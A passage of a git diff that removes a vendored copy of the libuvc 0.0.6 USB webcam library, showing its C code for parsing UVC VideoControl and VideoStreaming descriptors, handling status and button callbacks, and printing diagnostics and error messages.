-    info->ctrl_if.bEndpointAddress = if_desc->endpoint[0].bEndpointAddress;
-  }
-
-  buffer = if_desc->extra;
-  buffer_left = if_desc->extra_length;
-
-  while (buffer_left >= 3) { // parseX needs to see buf[0,2] = length,type
-    block_size = buffer[0];
-    parse_ret = uvc_parse_vc(dev, info, buffer, block_size);
-
-    if (parse_ret != UVC_SUCCESS) {
-      ret = parse_ret;
-      break;
-    }
-
-    buffer_left -= block_size;
-    buffer += block_size;
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** @internal
- * @brief Parse a VideoControl header.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vc_header(uvc_device_t *dev,
-				uvc_device_info_t *info,
-				const unsigned char *block, size_t block_size) {
-  size_t i;
-  uvc_error_t scan_ret, ret = UVC_SUCCESS;
-
-  UVC_ENTER();
-
-  /*
-  int uvc_version;
-  uvc_version = (block[4] >> 4) * 1000 + (block[4] & 0x0f) * 100
-    + (block[3] >> 4) * 10 + (block[3] & 0x0f);
-  */
-
-  info->ctrl_if.bcdUVC = SW_TO_SHORT(&block[3]);
-
-  switch (info->ctrl_if.bcdUVC) {
-  case 0x0100:
-    info->ctrl_if.dwClockFrequency = DW_TO_INT(block + 7);
-  case 0x010a:
-    info->ctrl_if.dwClockFrequency = DW_TO_INT(block + 7);
-  case 0x0110:
-    break;
-  default:
-    UVC_EXIT(UVC_ERROR_NOT_SUPPORTED);
-    return UVC_ERROR_NOT_SUPPORTED;
-  }
-
-  for (i = 12; i < block_size; ++i) {
-    scan_ret = uvc_scan_streaming(dev, info, block[i]);
-    if (scan_ret != UVC_SUCCESS) {
-      ret = scan_ret;
-      break;
-    }
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** @internal
- * @brief Parse a VideoControl input terminal.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vc_input_terminal(uvc_device_t *dev,
-					uvc_device_info_t *info,
-					const unsigned char *block, size_t block_size) {
-  uvc_input_terminal_t *term;
-  size_t i;
-
-  UVC_ENTER();
-
-  /* only supporting camera-type input terminals */
-  if (SW_TO_SHORT(&block[4]) != UVC_ITT_CAMERA) {
-    UVC_EXIT(UVC_SUCCESS);
-    return UVC_SUCCESS;
-  }
-
-  term = calloc(1, sizeof(*term));
-
-  term->bTerminalID = block[3];
-  term->wTerminalType = SW_TO_SHORT(&block[4]);
-  term->wObjectiveFocalLengthMin = SW_TO_SHORT(&block[8]);
-  term->wObjectiveFocalLengthMax = SW_TO_SHORT(&block[10]);
-  term->wOcularFocalLength = SW_TO_SHORT(&block[12]);
-
-  for (i = 14 + block[14]; i >= 15; --i)
-    term->bmControls = block[i] + (term->bmControls << 8);
-
-  DL_APPEND(info->ctrl_if.input_term_descs, term);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoControl processing unit.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vc_processing_unit(uvc_device_t *dev,
-					 uvc_device_info_t *info,
-					 const unsigned char *block, size_t block_size) {
-  uvc_processing_unit_t *unit;
-  size_t i;
-
-  UVC_ENTER();
-
-  unit = calloc(1, sizeof(*unit));
-  unit->bUnitID = block[3];
-  unit->bSourceID = block[4];
-
-  for (i = 7 + block[7]; i >= 8; --i)
-    unit->bmControls = block[i] + (unit->bmControls << 8);
-
-  DL_APPEND(info->ctrl_if.processing_unit_descs, unit);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoControl selector unit.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vc_selector_unit(uvc_device_t *dev,
-					 uvc_device_info_t *info,
-					 const unsigned char *block, size_t block_size) {
-  uvc_selector_unit_t *unit;
-
-  UVC_ENTER();
-
-  unit = calloc(1, sizeof(*unit));
-  unit->bUnitID = block[3];
-
-  DL_APPEND(info->ctrl_if.selector_unit_descs, unit);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoControl extension unit.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vc_extension_unit(uvc_device_t *dev,
-					uvc_device_info_t *info,
-					const unsigned char *block, size_t block_size) {
-  uvc_extension_unit_t *unit = calloc(1, sizeof(*unit));
-  const uint8_t *start_of_controls;
-  int size_of_controls, num_in_pins;
-  int i;
-
-  UVC_ENTER();
-
-  unit->bUnitID = block[3];
-  memcpy(unit->guidExtensionCode, &block[4], 16);
-
-  num_in_pins = block[21];
-  size_of_controls = block[22 + num_in_pins];
-  start_of_controls = &block[23 + num_in_pins];
-
-  for (i = size_of_controls - 1; i >= 0; --i)
-    unit->bmControls = start_of_controls[i] + (unit->bmControls << 8);
-
-  DL_APPEND(info->ctrl_if.extension_unit_descs, unit);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * Process a single VideoControl descriptor block
- * @ingroup device
- */
-uvc_error_t uvc_parse_vc(
-    uvc_device_t *dev,
-    uvc_device_info_t *info,
-    const unsigned char *block, size_t block_size) {
-  int descriptor_subtype;
-  uvc_error_t ret = UVC_SUCCESS;
-
-  UVC_ENTER();
-
-  if (block[1] != 36) { // not a CS_INTERFACE descriptor??
-    UVC_EXIT(UVC_SUCCESS);
-    return UVC_SUCCESS; // UVC_ERROR_INVALID_DEVICE;
-  }
-
-  descriptor_subtype = block[2];
-
-  switch (descriptor_subtype) {
-  case UVC_VC_HEADER:
-    ret = uvc_parse_vc_header(dev, info, block, block_size);
-    break;
-  case UVC_VC_INPUT_TERMINAL:
-    ret = uvc_parse_vc_input_terminal(dev, info, block, block_size);
-    break;
-  case UVC_VC_OUTPUT_TERMINAL:
-    break;
-  case UVC_VC_SELECTOR_UNIT:
-    ret = uvc_parse_vc_selector_unit(dev, info, block, block_size);
-    break;
-  case UVC_VC_PROCESSING_UNIT:
-    ret = uvc_parse_vc_processing_unit(dev, info, block, block_size);
-    break;
-  case UVC_VC_EXTENSION_UNIT:
-    ret = uvc_parse_vc_extension_unit(dev, info, block, block_size);
-    break;
-  default:
-    ret = UVC_ERROR_INVALID_DEVICE;
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** @internal
- * Process a VideoStreaming interface
- * @ingroup device
- */
-uvc_error_t uvc_scan_streaming(uvc_device_t *dev,
-			       uvc_device_info_t *info,
-			       int interface_idx) {
-  const struct libusb_interface_descriptor *if_desc;
-  const unsigned char *buffer;
-  size_t buffer_left, block_size;
-  uvc_error_t ret, parse_ret;
-  uvc_streaming_interface_t *stream_if;
-
-  UVC_ENTER();
-
-  ret = UVC_SUCCESS;
-
-  if_desc = &(info->config->interface[interface_idx].altsetting[0]);
-  buffer = if_desc->extra;
-  buffer_left = if_desc->extra_length;
-
-  stream_if = calloc(1, sizeof(*stream_if));
-  stream_if->parent = info;
-  stream_if->bInterfaceNumber = if_desc->bInterfaceNumber;
-  DL_APPEND(info->stream_ifs, stream_if);
-
-  while (buffer_left >= 3) {
-    block_size = buffer[0];
-    parse_ret = uvc_parse_vs(dev, info, stream_if, buffer, block_size);
-
-    if (parse_ret != UVC_SUCCESS) {
-      ret = parse_ret;
-      break;
-    }
-
-    buffer_left -= block_size;
-    buffer += block_size;
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** @internal
- * @brief Parse a VideoStreaming header block.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vs_input_header(uvc_streaming_interface_t *stream_if,
-				      const unsigned char *block,
-				      size_t block_size) {
-  UVC_ENTER();
-
-  stream_if->bEndpointAddress = block[6] & 0x8f;
-  stream_if->bTerminalLink = block[8];
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoStreaming uncompressed format block.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vs_format_uncompressed(uvc_streaming_interface_t *stream_if,
-					     const unsigned char *block,
-					     size_t block_size) {
-  UVC_ENTER();
-
-  uvc_format_desc_t *format = calloc(1, sizeof(*format));
-
-  format->parent = stream_if;
-  format->bDescriptorSubtype = block[2];
-  format->bFormatIndex = block[3];
-  //format->bmCapabilities = block[4];
-  //format->bmFlags = block[5];
-  memcpy(format->guidFormat, &block[5], 16);
-  format->bBitsPerPixel = block[21];
-  format->bDefaultFrameIndex = block[22];
-  format->bAspectRatioX = block[23];
-  format->bAspectRatioY = block[24];
-  format->bmInterlaceFlags = block[25];
-  format->bCopyProtect = block[26];
-
-  DL_APPEND(stream_if->format_descs, format);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoStreaming frame format block.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vs_frame_format(uvc_streaming_interface_t *stream_if,
-					     const unsigned char *block,
-					     size_t block_size) {
-  UVC_ENTER();
-
-  uvc_format_desc_t *format = calloc(1, sizeof(*format));
-
-  format->parent = stream_if;
-  format->bDescriptorSubtype = block[2];
-  format->bFormatIndex = block[3];
-  format->bNumFrameDescriptors = block[4];
-  memcpy(format->guidFormat, &block[5], 16);
-  format->bBitsPerPixel = block[21];
-  format->bDefaultFrameIndex = block[22];
-  format->bAspectRatioX = block[23];
-  format->bAspectRatioY = block[24];
-  format->bmInterlaceFlags = block[25];
-  format->bCopyProtect = block[26];
-  format->bVariableSize = block[27];
-
-  DL_APPEND(stream_if->format_descs, format);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoStreaming MJPEG format block.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vs_format_mjpeg(uvc_streaming_interface_t *stream_if,
-					     const unsigned char *block,
-					     size_t block_size) {
-  UVC_ENTER();
-
-  uvc_format_desc_t *format = calloc(1, sizeof(*format));
-
-  format->parent = stream_if;
-  format->bDescriptorSubtype = block[2];
-  format->bFormatIndex = block[3];
-  memcpy(format->fourccFormat, "MJPG", 4);
-  format->bmFlags = block[5];
-  format->bBitsPerPixel = 0;
-  format->bDefaultFrameIndex = block[6];
-  format->bAspectRatioX = block[7];
-  format->bAspectRatioY = block[8];
-  format->bmInterlaceFlags = block[9];
-  format->bCopyProtect = block[10];
-
-  DL_APPEND(stream_if->format_descs, format);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoStreaming uncompressed frame block.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vs_frame_frame(uvc_streaming_interface_t *stream_if,
-					    const unsigned char *block,
-					    size_t block_size) {
-  uvc_format_desc_t *format;
-  uvc_frame_desc_t *frame;
-
-  const unsigned char *p;
-  int i;
-
-  UVC_ENTER();
-
-  format = stream_if->format_descs->prev;
-  frame = calloc(1, sizeof(*frame));
-
-  frame->parent = format;
-
-  frame->bDescriptorSubtype = block[2];
-  frame->bFrameIndex = block[3];
-  frame->bmCapabilities = block[4];
-  frame->wWidth = block[5] + (block[6] << 8);
-  frame->wHeight = block[7] + (block[8] << 8);
-  frame->dwMinBitRate = DW_TO_INT(&block[9]);
-  frame->dwMaxBitRate = DW_TO_INT(&block[13]);
-  frame->dwDefaultFrameInterval = DW_TO_INT(&block[17]);
-  frame->bFrameIntervalType = block[21];
-  frame->dwBytesPerLine = DW_TO_INT(&block[22]);
-
-  if (block[21] == 0) {
-    frame->dwMinFrameInterval = DW_TO_INT(&block[26]);
-    frame->dwMaxFrameInterval = DW_TO_INT(&block[30]);
-    frame->dwFrameIntervalStep = DW_TO_INT(&block[34]);
-  } else {
-    frame->intervals = calloc(block[21] + 1, sizeof(frame->intervals[0]));
-    p = &block[26];
-
-    for (i = 0; i < block[21]; ++i) {
-      frame->intervals[i] = DW_TO_INT(p);
-      p += 4;
-    }
-    frame->intervals[block[21]] = 0;
-  }
-
-  DL_APPEND(format->frame_descs, frame);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * @brief Parse a VideoStreaming uncompressed frame block.
- * @ingroup device
- */
-uvc_error_t uvc_parse_vs_frame_uncompressed(uvc_streaming_interface_t *stream_if,
-					    const unsigned char *block,
-					    size_t block_size) {
-  uvc_format_desc_t *format;
-  uvc_frame_desc_t *frame;
-
-  const unsigned char *p;
-  int i;
-
-  UVC_ENTER();
-
-  format = stream_if->format_descs->prev;
-  frame = calloc(1, sizeof(*frame));
-
-  frame->parent = format;
-
-  frame->bDescriptorSubtype = block[2];
-  frame->bFrameIndex = block[3];
-  frame->bmCapabilities = block[4];
-  frame->wWidth = block[5] + (block[6] << 8);
-  frame->wHeight = block[7] + (block[8] << 8);
-  frame->dwMinBitRate = DW_TO_INT(&block[9]);
-  frame->dwMaxBitRate = DW_TO_INT(&block[13]);
-  frame->dwMaxVideoFrameBufferSize = DW_TO_INT(&block[17]);
-  frame->dwDefaultFrameInterval = DW_TO_INT(&block[21]);
-  frame->bFrameIntervalType = block[25];
-
-  if (block[25] == 0) {
-    frame->dwMinFrameInterval = DW_TO_INT(&block[26]);
-    frame->dwMaxFrameInterval = DW_TO_INT(&block[30]);
-    frame->dwFrameIntervalStep = DW_TO_INT(&block[34]);
-  } else {
-    frame->intervals = calloc(block[25] + 1, sizeof(frame->intervals[0]));
-    p = &block[26];
-
-    for (i = 0; i < block[25]; ++i) {
-      frame->intervals[i] = DW_TO_INT(p);
-      p += 4;
-    }
-    frame->intervals[block[25]] = 0;
-  }
-
-  DL_APPEND(format->frame_descs, frame);
-
-  UVC_EXIT(UVC_SUCCESS);
-  return UVC_SUCCESS;
-}
-
-/** @internal
- * Process a single VideoStreaming descriptor block
- * @ingroup device
- */
-uvc_error_t uvc_parse_vs(
-    uvc_device_t *dev,
-    uvc_device_info_t *info,
-    uvc_streaming_interface_t *stream_if,
-    const unsigned char *block, size_t block_size) {
-  uvc_error_t ret;
-  int descriptor_subtype;
-
-  UVC_ENTER();
-
-  ret = UVC_SUCCESS;
-  descriptor_subtype = block[2];
-
-  switch (descriptor_subtype) {
-  case UVC_VS_INPUT_HEADER:
-    ret = uvc_parse_vs_input_header(stream_if, block, block_size);
-    break;
-  case UVC_VS_OUTPUT_HEADER:
-    fprintf ( stderr, "unsupported descriptor subtype VS_OUTPUT_HEADER\n" );
-    break;
-  case UVC_VS_STILL_IMAGE_FRAME:
-    fprintf ( stderr, "unsupported descriptor subtype VS_STILL_IMAGE_FRAME\n" );
-    break;
-  case UVC_VS_FORMAT_UNCOMPRESSED:
-    ret = uvc_parse_vs_format_uncompressed(stream_if, block, block_size);
-    break;
-  case UVC_VS_FORMAT_MJPEG:
-    ret = uvc_parse_vs_format_mjpeg(stream_if, block, block_size);
-    break;
-  case UVC_VS_FRAME_UNCOMPRESSED:
-  case UVC_VS_FRAME_MJPEG:
-    ret = uvc_parse_vs_frame_uncompressed(stream_if, block, block_size);
-    break;
-  case UVC_VS_FORMAT_MPEG2TS:
-    fprintf ( stderr, "unsupported descriptor subtype VS_FORMAT_MPEG2TS\n" );
-    break;
-  case UVC_VS_FORMAT_DV:
-    fprintf ( stderr, "unsupported descriptor subtype VS_FORMAT_DV\n" );
-    break;
-  case UVC_VS_COLORFORMAT:
-    fprintf ( stderr, "unsupported descriptor subtype VS_COLORFORMAT\n" );
-    break;
-  case UVC_VS_FORMAT_FRAME_BASED:
-    ret = uvc_parse_vs_frame_format ( stream_if, block, block_size );
-    break;
-  case UVC_VS_FRAME_FRAME_BASED:
-    ret = uvc_parse_vs_frame_frame ( stream_if, block, block_size );
-    break;
-  case UVC_VS_FORMAT_STREAM_BASED:
-    fprintf ( stderr, "unsupported descriptor subtype VS_FORMAT_STREAM_BASED\n" );
-    break;
-  default:
-    /** @todo handle JPEG and maybe still frames or even DV... */
-    //fprintf ( stderr, "unsupported descriptor subtype: %d\n",descriptor_subtype );
-    break;
-  }
-
-  UVC_EXIT(ret);
-  return ret;
-}
-
-/** @internal
- * @brief Free memory associated with a UVC device
- * @pre Streaming must be stopped, and threads must have died
- */
-void uvc_free_devh(uvc_device_handle_t *devh) {
-  UVC_ENTER();
-
-  if (devh->info)
-    uvc_free_device_info(devh->info);
-
-  if (devh->status_xfer)
-    libusb_free_transfer(devh->status_xfer);
-
-  free(devh);
-
-  UVC_EXIT_VOID();
-}
-
-/** @brief Close a device
- *
- * @ingroup device
- *
- * Ends any stream that's in progress.
- *
- * The device handle and frame structures will be invalidated.
- */
-void uvc_close(uvc_device_handle_t *devh) {
-  UVC_ENTER();
-  uvc_context_t *ctx = devh->dev->ctx;
-
-  if (devh->streams)
-    uvc_stop_streaming(devh);
-
-  uvc_release_if(devh, devh->info->ctrl_if.bInterfaceNumber);
-
-  /* If we are managing the libusb context and this is the last open device,
-   * then we need to cancel the handler thread. When we call libusb_close,
-   * it'll cause a return from the thread's libusb_handle_events call, after
-   * which the handler thread will check the flag we set and then exit. */
-  if (ctx->own_usb_ctx && ctx->open_devices == devh && devh->next == NULL) {
-    ctx->kill_handler_thread = 1;
-    libusb_close(devh->usb_devh);
-    pthread_join(ctx->handler_thread, NULL);
-  } else {
-    libusb_close(devh->usb_devh);
-  }
-
-  DL_DELETE(ctx->open_devices, devh);
-
-  uvc_unref_device(devh->dev);
-
-  uvc_free_devh(devh);
-
-  UVC_EXIT_VOID();
-}
-
-/** @internal
- * @brief Get number of open devices
- */
-size_t uvc_num_devices(uvc_context_t *ctx) {
-  size_t count = 0;
-
-  uvc_device_handle_t *devh;
-
-  UVC_ENTER();
-
-  DL_FOREACH(ctx->open_devices, devh) {
-    count++;
-  }
-
-  UVC_EXIT((int) count);
-  return count;
-}
-
-void uvc_process_control_status(uvc_device_handle_t *devh, unsigned char *data, int len) {
-  enum uvc_status_class status_class;
-  uint8_t originator = 0, selector = 0, event = 0;
-  enum uvc_status_attribute attribute = UVC_STATUS_ATTRIBUTE_UNKNOWN;
-  void *content = NULL;
-  size_t content_len = 0;
-  int found_entity = 0;
-  struct uvc_input_terminal *input_terminal;
-  struct uvc_processing_unit *processing_unit;
-
-  UVC_ENTER();
-
-  if (len < 5) {
-    UVC_DEBUG("Short read of VideoControl status update (%d bytes)", len);
-    UVC_EXIT_VOID();
-    return;
-  }
-
-  originator = data[1];
-  event = data[2];
-  selector = data[3];
-
-  if (originator == 0) {
-    UVC_DEBUG("Unhandled update from VC interface");
-    UVC_EXIT_VOID();
-    return;  /* @todo VideoControl virtual entity interface updates */
-  }
-
-  if (event != 0) {
-    UVC_DEBUG("Unhandled VC event %d", (int) event);
-    UVC_EXIT_VOID();
-    return;
-  }
-
-  /* printf("bSelector: %d\n", selector); */
-
-  DL_FOREACH(devh->info->ctrl_if.input_term_descs, input_terminal) {
-    if (input_terminal->bTerminalID == originator) {
-      status_class = UVC_STATUS_CLASS_CONTROL_CAMERA;
-      found_entity = 1;
-      break;
-    }
-  }
-
-  if (!found_entity) {
-    DL_FOREACH(devh->info->ctrl_if.processing_unit_descs, processing_unit) {
-      if (processing_unit->bUnitID == originator) {
-        status_class = UVC_STATUS_CLASS_CONTROL_PROCESSING;
-        found_entity = 1;
-        break;
-      }
-    }
-  }
-
-  if (!found_entity) {
-    UVC_DEBUG("Got status update for unknown VideoControl entity %d",
-  (int) originator);
-    UVC_EXIT_VOID();
-    return;
-  }
-
-  attribute = data[4];
-  content = data + 5;
-  content_len = len - 5;
-
-  UVC_DEBUG("Event: class=%d, event=%d, selector=%d, attribute=%d, content_len=%zd",
-    status_class, event, selector, attribute, content_len);
-
-  if(devh->status_cb) {
-    UVC_DEBUG("Running user-supplied status callback");
-    devh->status_cb(status_class,
-                    event,
-                    selector,
-                    attribute,
-                    content, content_len,
-                    devh->status_user_ptr);
-  }
-  
-  UVC_EXIT_VOID();
-}
-
-void uvc_process_streaming_status(uvc_device_handle_t *devh, unsigned char *data, int len) {
-  
-  UVC_ENTER();
-
-  if (len < 3) {
-    UVC_DEBUG("Invalid streaming status event received.\n");
-    UVC_EXIT_VOID();
-    return;
-  }
-
-  if (data[2] == 0) {
-    if (len < 4) {
-      UVC_DEBUG("Short read of status update (%d bytes)", len);
-      UVC_EXIT_VOID();
-      return;
-    }
-    UVC_DEBUG("Button (intf %u) %s len %d\n", data[1], data[3] ? "pressed" : "released", len);
-    
-    if(devh->button_cb) {
-      UVC_DEBUG("Running user-supplied button callback");
-      devh->button_cb(data[1],
-                      data[3],
-                      devh->button_user_ptr);
-    }
-  } else {
-    UVC_DEBUG("Stream %u error event %02x %02x len %d.\n", data[1], data[2], data[3], len);
-  }
-
-  UVC_EXIT_VOID();
-}
-
-void uvc_process_status_xfer(uvc_device_handle_t *devh, struct libusb_transfer *transfer) {
-  
-  UVC_ENTER();
-
-  /* printf("Got transfer of aLen = %d\n", transfer->actual_length); */
-
-  if (transfer->actual_length > 0) {
-    switch (transfer->buffer[0] & 0x0f) {
-    case 1: /* VideoControl interface */
-      uvc_process_control_status(devh, transfer->buffer, transfer->actual_length);
-      break;
-    case 2:  /* VideoStreaming interface */
-      uvc_process_streaming_status(devh, transfer->buffer, transfer->actual_length);
-      break;
-    }
-  }
-
-  UVC_EXIT_VOID();
-}
-
-/** @internal
- * @brief Process asynchronous status updates from the device.
- */
-void LIBUSB_CALL _uvc_status_callback(struct libusb_transfer *transfer) {
-  UVC_ENTER();
-
-  uvc_device_handle_t *devh = (uvc_device_handle_t *) transfer->user_data;
-
-  switch (transfer->status) {
-  case LIBUSB_TRANSFER_ERROR:
-  case LIBUSB_TRANSFER_CANCELLED:
-  case LIBUSB_TRANSFER_NO_DEVICE:
-    UVC_DEBUG("not processing/resubmitting, status = %d", transfer->status);
-    UVC_EXIT_VOID();
-    return;
-  case LIBUSB_TRANSFER_COMPLETED:
-    uvc_process_status_xfer(devh, transfer);
-    break;
-  case LIBUSB_TRANSFER_TIMED_OUT:
-  case LIBUSB_TRANSFER_STALL:
-  case LIBUSB_TRANSFER_OVERFLOW:
-    UVC_DEBUG("retrying transfer, status = %d", transfer->status);
-    break;
-  }
-
-#ifdef UVC_DEBUGGING
-  uvc_error_t ret =
-#endif
-      libusb_submit_transfer(transfer);
-  UVC_DEBUG("libusb_submit_transfer() = %d", ret);
-
-  UVC_EXIT_VOID();
-}
-
-/** @brief Set a callback function to receive status updates
- *
- * @ingroup device
- */
-void uvc_set_status_callback(uvc_device_handle_t *devh,
-                             uvc_status_callback_t cb,
-                             void *user_ptr) {
-  UVC_ENTER();
-
-  devh->status_cb = cb;
-  devh->status_user_ptr = user_ptr;
-
-  UVC_EXIT_VOID();
-}
-
-/** @brief Set a callback function to receive button events
- *
- * @ingroup device
- */
-void uvc_set_button_callback(uvc_device_handle_t *devh,
-                             uvc_button_callback_t cb,
-                             void *user_ptr) {
-  UVC_ENTER();
-
-  devh->button_cb = cb;
-  devh->button_user_ptr = user_ptr;
-
-  UVC_EXIT_VOID();
-}
-
-/**
- * @brief Get format descriptions for the open device.
- *
- * @note Do not modify the returned structure.
- *
- * @param devh Device handle to an open UVC device
- */
-const uvc_format_desc_t *uvc_get_format_descs(uvc_device_handle_t *devh) {
-  return devh->info->stream_ifs->format_descs;
-}
-
diff --git a/thirdparty/libuvc-0.0.6/src/diag.c b/thirdparty/libuvc-0.0.6/src/diag.c
deleted file mode 100644
index fa17731..0000000
--- a/thirdparty/libuvc-0.0.6/src/diag.c
+++ /dev/null
@@ -1,355 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
-*     copyright notice, this list of conditions and the following
-*     disclaimer in the documentation and/or other materials provided
-*     with the distribution.
-*   * Neither the name of the author nor other contributors may be
-*     used to endorse or promote products derived from this software
-*     without specific prior written permission.
-*
-*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-*  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-*  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
-*  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
-*  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
-*  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
-*  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-*  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
-*  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-*  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-*  POSSIBILITY OF SUCH DAMAGE.
-*********************************************************************/
-/**
- * @defgroup diag Diagnostics
- * @brief Interpretation of devices, error codes and negotiated stream parameters
- */
-
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-
-/** @internal */
-typedef struct _uvc_error_msg {
-  uvc_error_t err;
-  const char *msg;
-} _uvc_error_msg_t;
-
-static const _uvc_error_msg_t uvc_error_msgs[] = {
-  {UVC_SUCCESS, "Success"},
-  {UVC_ERROR_IO, "I/O error"},
-  {UVC_ERROR_INVALID_PARAM, "Invalid parameter"},
-  {UVC_ERROR_ACCESS, "Access denied"},
-  {UVC_ERROR_NO_DEVICE, "No such device"},
-  {UVC_ERROR_NOT_FOUND, "Not found"},
-  {UVC_ERROR_BUSY, "Busy"},
-  {UVC_ERROR_TIMEOUT, "Timeout"},
-  {UVC_ERROR_OVERFLOW, "Overflow"},
-  {UVC_ERROR_PIPE, "Pipe"},
-  {UVC_ERROR_INTERRUPTED, "Interrupted"},
-  {UVC_ERROR_NO_MEM, "Out of memory"},
-  {UVC_ERROR_NOT_SUPPORTED, "Not supported"},
-  {UVC_ERROR_INVALID_DEVICE, "Invalid device"},
-  {UVC_ERROR_INVALID_MODE, "Invalid mode"},
-  {UVC_ERROR_CALLBACK_EXISTS, "Callback exists"}
-};
-
-/** @brief Print a message explaining an error in the UVC driver
- * @ingroup diag
- *
- * @param err UVC error code
- * @param msg Optional custom message, prepended to output
- */
-void uvc_perror(uvc_error_t err, const char *msg) {
-  if (msg && *msg) {
-    fputs(msg, stderr);
-    fputs(": ", stderr);
-  }
-
-  fprintf(stderr, "%s (%d)\n", uvc_strerror(err), err);
-}
-
-/** @brief Return a string explaining an error in the UVC driver
- * @ingroup diag
- *
- * @param err UVC error code
- * @return error message
- */
-const char* uvc_strerror(uvc_error_t err) {
-  size_t idx;
-
-  for (idx = 0; idx < sizeof(uvc_error_msgs) / sizeof(*uvc_error_msgs); ++idx) {
-    if (uvc_error_msgs[idx].err == err) {
-      return uvc_error_msgs[idx].msg;
-    }
-  }
-
-  return "Unknown error";
-}
-
-/** @brief Print the values in a stream control block
- * @ingroup diag
- *
- * @param devh UVC device
- * @param stream Output stream (stderr if NULL)
- */
-void uvc_print_stream_ctrl(uvc_stream_ctrl_t *ctrl, FILE *stream) {
-  if (stream == NULL)
-    stream = stderr;
-
-  fprintf(stream, "bmHint: %04x\n", ctrl->bmHint);
-  fprintf(stream, "bFormatIndex: %d\n", ctrl->bFormatIndex);
-  fprintf(stream, "bFrameIndex: %d\n", ctrl->bFrameIndex);
-  fprintf(stream, "dwFrameInterval: %u\n", ctrl->dwFrameInterval);
-  fprintf(stream, "wKeyFrameRate: %d\n", ctrl->wKeyFrameRate);
-  fprintf(stream, "wPFrameRate: %d\n", ctrl->wPFrameRate);
-  fprintf(stream, "wCompQuality: %d\n", ctrl->wCompQuality);
-  fprintf(stream, "wCompWindowSize: %d\n", ctrl->wCompWindowSize);
-  fprintf(stream, "wDelay: %d\n", ctrl->wDelay);
-  fprintf(stream, "dwMaxVideoFrameSize: %u\n", ctrl->dwMaxVideoFrameSize);
-  fprintf(stream, "dwMaxPayloadTransferSize: %u\n", ctrl->dwMaxPayloadTransferSize);
-  fprintf(stream, "bInterfaceNumber: %d\n", ctrl->bInterfaceNumber);
-}
-
-static const char *_uvc_name_for_format_subtype(uint8_t subtype) {
-  switch (subtype) {
-  case UVC_VS_FORMAT_UNCOMPRESSED:
-    return "UncompressedFormat";
-  case UVC_VS_FORMAT_MJPEG:
-    return "MJPEGFormat";
-  case UVC_VS_FORMAT_FRAME_BASED:
-    return "FrameFormat";
-  default:
-    return "Unknown";
-  }
-}
-
-/** @brief Print camera capabilities and configuration.
- * @ingroup diag
- *
- * @param devh UVC device
- * @param stream Output stream (stderr if NULL)
- */
-void uvc_print_diag(uvc_device_handle_t *devh, FILE *stream) {
-  if (stream == NULL)
-    stream = stderr;
-
-  if (devh->info->ctrl_if.bcdUVC) {
-    uvc_streaming_interface_t *stream_if;
-    int stream_idx = 0;
-
-    uvc_device_descriptor_t *desc;
-    uvc_get_device_descriptor(devh->dev, &desc);
-
-    fprintf(stream, "DEVICE CONFIGURATION (%04x:%04x/%s) ---\n",
-        desc->idVendor, desc->idProduct,
-        desc->serialNumber ? desc->serialNumber : "[none]");
-
-    uvc_free_device_descriptor(desc);
-
-    fprintf(stream, "Status: %s\n", devh->streams ? "streaming" : "idle");
-
-    fprintf(stream, "VideoControl:\n"
-        "\tbcdUVC: 0x%04x\n",
-        devh->info->ctrl_if.bcdUVC);
-
-    DL_FOREACH(devh->info->stream_ifs, stream_if) {
